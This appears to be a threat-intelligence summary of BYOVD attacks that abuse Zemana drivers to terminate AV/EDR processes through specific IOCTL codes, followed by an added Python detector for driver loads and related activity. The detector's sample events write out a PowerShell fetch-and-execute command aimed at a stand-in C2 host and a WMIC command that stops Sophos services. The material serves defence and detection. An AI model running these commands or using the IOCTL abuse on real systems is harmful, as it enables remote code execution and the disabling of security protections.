Keypoints
- BYOVD (Bring Your Own Vulnerable Driver) attacks drop legitimate vulnerable drivers to escalate to kernel-level privileges and manipulate security tooling.
- Zemana drivers zam64.sys and zamguard64.sys share a vulnerability that lets an attacker add arbitrary processes to the driver’s allow list via IOCTL 0x80002010 and request actions (e.g., process termination) via IOCTL 0x80002048.
- The Terminator tool family (commercial and open-source variants) automates abuse of the Zemana drivers; it has been ported to multiple languages (C#, Nim) and repackaged by threat actors.
- Observed attack chains included exploitation of a Citrix vulnerability, injection into wermgr.exe, attempts to disable Sophos via WMIC, and deployment of a packed ter.exe that unpacks an AES-256-encrypted payload derived from Terminator code.
- Other incident variants used AuKill/ped.sys when Zemana driver attempts failed; attempts to load drivers and run Terminator variants were often blocked by behavioral protection rules.
- Detection challenges include drivers being legitimate OS components, actors packing/obfuscating tools, and variants being shared on criminal forums and public repos like loldrivers.io.
MITRE Techniques
- [T1215] Kernel Modules and Extensions – Use of legitimate but vulnerable kernel drivers (Zemana zam64.sys / zamguard64.sys) to gain kernel-level privileges and invoke driver functionality (‘…drop known vulnerable drivers on a compromised machine and then exploit the bug(s) to gain kernel-level privileges.’).
- [T1548] Abuse Elevation Control Mechanism – Requirement and use of UAC bypass or administrative privileges to install and abuse vulnerable drivers (‘…would need administrative privileges and a User Account Control (UAC) bypass…’).
- [T1562.001] Impair Defenses: Disable or Modify Tools – Using driver IOCTLs to add attacker processes to allow lists and issue termination requests against AV/EDR processes (‘…send an IOCTL code 0x80002010 … add their own process to the allow list … terminate a targeted process by sending an IOCTL request with code 0x80002048.’).
- [T1190] Exploit Public-Facing Application – Initial access in observed incidents was likely obtained via exploitation of a vulnerable Citrix application (‘initial access was likely obtained via exploiting a vulnerable Citrix application.’).
- [T1059.001] Command and Scripting Interpreter: PowerShell – Use of PowerShell to fetch and execute a script used to install XMRig (cryptominer) from a remote host (‘attempted to execute a PowerShell command to download a text file from a C2 server.’).
Indicators of Compromise
- [Driver filename] driver abused in BYOVD attacks – zam64.sys (Zemana Anti-Logger), zamguard64.sys (Zemana Anti-Malware)
- [Executable / dropped files] attacker binaries and drivers – ter.exe (packed Terminator variant), updatedrv.sys (masquerading Zemana driver path), ped.sys (Process Explorer driver used by AuKill)
- [Tool names / artifacts] offensive tool variants observed – Terminator, SharpTerminator (C# port), Ternimator (Nim port), and CSharpTerminator
- [Repository / listing] known vulnerable driver repository referenced – loldrivers.io (catalog of vulnerable drivers and hashes)
BYOVD attacks drop legitimate but vulnerable drivers to exploit inadequate driver-side verification and invoke privileged IOCTL operations. In the Zemana case, both zam64.sys and zamguard64.sys expose an insufficiently validated interface that maintains an allow list: an attacker with administrative rights can send IOCTL 0x80002010 with a target PID to add a malicious process to that allow list, then issue IOCTL 0x80002048 to attempt termination of AV/EDR processes. Exploitation therefore requires administrative privileges (or a UAC bypass) or social engineering to get the driver installed, and attackers commonly pack or obfuscate payloads to evade static detection.
Adversaries have automated these steps in tools like Terminator and its forks (SharpTerminator, Ternimator), which have been repackaged and modified (e.g., ter.exe unpacks an AES-256 encrypted BINARY resource using a hardcoded key and reveals a PDB path referencing “Terminator-master”). Observed chains included exploitation of a Citrix application, code injection into wermgr.exe, failed WMIC attempts to stop Sophos services, dropping the vulnerable driver, and executing a modified Terminator; when Zemana attempts failed, actors reverted to other EDR killers such as AuKill using ped.sys.
Defenders should focus on detecting the behavioral stages: exploitation and initial access (e.g., Citrix exploits), injection/execution (packed unpacking routines, AES-decrypted payloads), driver drop/load attempts, and IOCTL abuse (requests to add processes to allow lists or terminate protected processes). Behavioral protections successfully blocked several driver loads and PowerShell-based XMRig download attempts; additional mitigations include enabling tamper protection, tracking and blocklisting unused vulnerable drivers, and adding driver checks into vulnerability management programs.
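As an added example (not code from the report or from the vendor), the following Python detector applies the behavioral stages above to a few constructed Sysmon-like event records: vulnerable-driver loads matched by filename and by SHA-256 (so a renamed copy such as updatedrv.sys is still caught), WMIC service tampering, and PowerShell remote downloads. The event schema is simplified and the hash values are placeholders to be replaced with entries from loldrivers.io.

```python
# Added example (not the report's code): flags the behavioral stages described
# above in constructed Sysmon-like events: vulnerable-driver loads, matched by
# filename and by SHA-256 so a renamed copy such as updatedrv.sys is still
# caught, plus WMIC service tampering and PowerShell remote downloads.
# Hashes are constructed placeholders; real ones come from loldrivers.io.
import re

VULNERABLE_DRIVER_NAMES = {"zam64.sys", "zamguard64.sys", "ped.sys"}
DRIVER_HASH_BLOCKLIST = {"a" * 64: "zam64.sys", "b" * 64: "zamguard64.sys"}  # placeholders
WMIC_TAMPER_RE = re.compile(r"\bwmic\b.*\bservice\b.*\b(stopservice|delete)\b", re.I)
PS_DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)


def analyze(events):
    """Return (severity, reason) findings for a list of event dicts."""
    findings = []
    for ev in events:
        if ev.get("EventType") == "DriverLoad":
            path = ev.get("ImageLoaded", "")
            name = path.rsplit("\\", 1)[-1].lower()
            m = re.search(r"SHA256=([0-9a-fA-F]{64})", ev.get("Hashes", ""))
            sha = m.group(1).lower() if m else ""
            if name in VULNERABLE_DRIVER_NAMES:
                findings.append(("high", f"known vulnerable driver loaded: {path}"))
            elif sha in DRIVER_HASH_BLOCKLIST:
                # Filename was changed, but the hash still identifies the driver.
                findings.append(("high", f"renamed {DRIVER_HASH_BLOCKLIST[sha]} loaded as {path}"))
        elif ev.get("EventType") == "ProcessCreate":
            image, cmd = ev.get("Image", "").lower(), ev.get("CommandLine", "")
            if image.endswith("wmic.exe") and WMIC_TAMPER_RE.search(cmd):
                findings.append(("medium", f"WMIC service tampering: {cmd}"))
            elif image.endswith("powershell.exe") and PS_DOWNLOAD_RE.search(cmd):
                findings.append(("medium", f"PowerShell remote download: {cmd}"))
    return findings


SAMPLE_EVENTS = [  # constructed, simplified Sysmon-like records
    {"EventType": "DriverLoad", "ImageLoaded": r"C:\Windows\Temp\updatedrv.sys",
     "Hashes": "SHA256=" + "a" * 64},
    {"EventType": "DriverLoad", "ImageLoaded": r"C:\Windows\System32\drivers\ntfs.sys",
     "Hashes": "SHA256=" + "c" * 64},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic service where \"name like '%Sophos%'\" call stopservice"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/x.txt')\""},
]
```

Running analyze(SAMPLE_EVENTS) yields one high finding for the renamed driver and two medium findings for the WMIC and PowerShell commands, while the legitimate ntfs.sys load produces nothing.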